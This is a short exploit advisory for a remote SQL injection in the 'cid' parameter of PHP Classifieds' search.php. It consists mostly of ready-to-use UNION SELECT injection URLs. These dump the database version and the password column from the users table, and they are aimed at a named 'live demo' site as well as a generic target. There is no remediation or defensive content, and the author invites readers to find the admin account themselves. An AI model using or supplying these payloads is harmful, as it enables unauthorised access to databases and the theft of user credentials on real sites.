PHP Classifieds suffers from a remote SQL injection vulnerability.
6ddd062f8698516c866d5d0fd380587975a8a952c4e616e63aa39d4a07ea2291
PHP Classifieds[cid]Remote SQL Injection Vulnerability
--------------------------------------------------------------------------------
----------------------------------------------------------------
script : PHP Classifieds
script : http://www.preprojects.com/pclphp.asp
Risk : High
----------------------------------------------------------------
Dicovered by : d3b4g
email : bl4ckend[at]gmail[dot]com
Site. www.bl4ck3nd.info
----------------------------------------------------------------
Exploit : http: //www.target.com/[path]/search.php?cid=-1+union+all+select+1,2,concat_ws(@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users/*
Live demo: http: //www.hostnomi.net/classi/search.php?cid=-1+union+all+select+1,2,concat(@@version),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users/*
For passowrd : http://www.hostnomi.net/classi/search.php?cid=-1+union+all+select+1,2,concat(pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users/*
For admin : [Find it ] :P
----------------------------------------------------------------
----------------------------------------------------------------
Greetz: str0ke,,Hotlism.org,All my friends
-----------------------------------------------------------------
Proud to be a maldivian :))
=======================